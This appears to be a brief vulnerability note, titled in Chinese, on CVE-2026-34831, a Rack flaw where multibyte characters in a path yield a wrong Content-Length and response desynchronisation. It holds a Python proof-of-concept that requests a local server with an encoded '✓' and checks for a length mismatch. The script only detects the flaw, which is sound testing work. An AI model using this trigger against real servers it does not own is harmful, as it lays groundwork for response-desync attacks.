CVE-2026-34831 Rack Content-Length计算错误致响应去同步

import requests # Target URL vulnerable to CVE-2026-34831 # The character '✓' is represented by 3 bytes (%E2%9C%93) but has a size of 1 character. url = "http://localhost:9292/%E2%9C%93" try: response = requests.get(url) declared_len = response.headers.get('Content-Length') actual_bytes = len(response.content) print(f"[+] Request sent to: {url}") print(f"[+] Declared Content-Length: {declared_len}") print(f"[+] Actual Response Bytes: {actual_bytes}") if declared_len and int(declared_len) < actual_bytes: print("[!] Vulnerability confirmed: Content-Length mismatch detected.") else: print("[-] Vulnerability not detected or patched.") except Exception as e: print(f"Error: {e}")